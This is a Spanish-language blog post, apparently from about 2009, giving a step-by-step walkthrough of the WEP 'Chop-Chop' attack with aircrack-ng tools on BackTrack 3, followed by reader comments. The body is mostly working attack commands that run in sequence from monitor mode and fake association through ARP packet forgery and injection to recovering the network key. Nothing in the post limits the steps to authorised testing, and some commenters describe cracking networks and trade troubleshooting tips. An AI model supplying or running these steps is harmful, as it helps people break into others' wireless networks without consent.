Tutorial: Ataque Chop-Chop

Bueno, esta tutorial me basare para los que ya saben crackear una wep, así que no me molestare en explicar como crackear una wep en este tutorial y los que no tengan ninguna idea aqui en el foro hay de como hacerlo en tal caso, de no entender puedes preguntar o simplemente les puedo hacer un tutorial, pero creo que los que hay en el foro soy muy entendibles. Quedo aclarar que el distro que use no fue nada menos que backtrack 3 Final.

Empecemos...

1.- checamos cual es nuestra interfase para poderlo en modo monitor:

airmon-ng



2.- como sabemos ponemos nuestra interface en modo monitor:

airmon-ng start



3.- ahora miramos que AP tenemos.

airodump-ng



4.- Como vemos nos aparecen algunas así que seleccionamos una, en este caso seleccionare 2WIREXXX.

airodump-ng c 6 -w lir -i



5.- Después nos asociamos:

aireplay-ng -1 0 -e 2WIRE -a 00:14:95:CE:2E:11 -h 00:11:22:33:44:55



6.- Ahora procedemos hacer el ataque Chop-Chop:

aireplay-ng -4 -b 00:14:95:CE:2E:11 -h 00:11:22:33:44:55



Le ponemos yes



7.- Usamos tcpdump para poder mirar la ip que nos interesa.

tcpdump -s 0 -n -e -r replay_dec-0920-161359.cap



8.- Creamos una petición de paquete arp usando el archivo .xor:

packetforge-ng -0 -a 00:14:95:ce:2e:11 -h 00:11:22:33:44:55 -k 192.168.1.140 -l 192.168.1.254 -y replay_dec-0920-161359.xor -w ddlr.cap



-l ip origen
-k ip destino

9.- Finalmente enviamos el recien creado paquete de peticion arp:

aireplay-ng -2 -r ddlr.cap

Le damos yes:





y empezara inyectar super rápido, te sorprenderás de la velocidad.

10.- Finalmente sacamos el password:

aircrack-ng lir-01.ivs



saludos cualquier duda no duden en preguntar :).
Posted on 11:06 by LIR and filed under | 8 Comments »

8 comentarios:

  dijo... @ 28 de diciembre de 2009, 19:11

ta weno, lo probare

luis dijo... @ 17 de diciembre de 2010, 6:55

hermano tengo un problema... jugando con este nuevo cacharro (Huawei HG520) por mas que intento no puedo obtener la clave WEP ... se qqueda inyectando (paso 9) aparece todo normal envia y todo, el problema esta en que los "#DATA" no se mueve y al momento de lanzar el aircrack solo reconoce muy pocos IVS (no mas de 50) ... ya use tmb "-3 -b " y nada, pueden enviarse hasta 100,000 packets. pero al momento de lanzar el aircrack, solo reconoce los 40 de la columna #data y con esos 40 IVs no saco nada xD... espero y me entiendas y puedas orientar... Gracias =D...

Unknown dijo... @ 22 de abril de 2011, 10:28

Excelente aporte amigo me hacia falta comprender como se hacia este tipo de ataque, muchas gracias.

carlos dijo... @ 11 de julio de 2011, 6:30

Exelente tutorial, me sirvio para una red que por mas authentificacion falsa he inyectar pequetes nunca subia el data a lo mas subia hasta 50datas en una hora pero con este ataque saque la clave en 5 minutos!! gracias ah y una cosa mas al intentar sacar la clave web con: aircrack-ng lir-01.ivs no me funciono.. peros i funciono con: aircrack-ng lir-01.cap.. bueno no se por que ni me interesa :D

anarchist dijo... @ 15 de agosto de 2011, 9:44

hey buen aporte, luis tienes que checar si tu tarjeta soporta la inyección de paquetes y si la intensidad de la señal no es demasiado baja de ser así luego no logra capturar los data

descuartizador666 dijo... @ 13 de diciembre de 2011, 10:37

Es casi lo nismo q wufiway y aparte em modo minitor es mas facil con " " pro ta chido

mercano dijo... @ 28 de diciembre de 2011, 5:55

sencillo explicado. esta bueno

angelm6a dijo... @ 29 de febrero de 2012, 20:07

mejor es wifiway

Publicar un comentario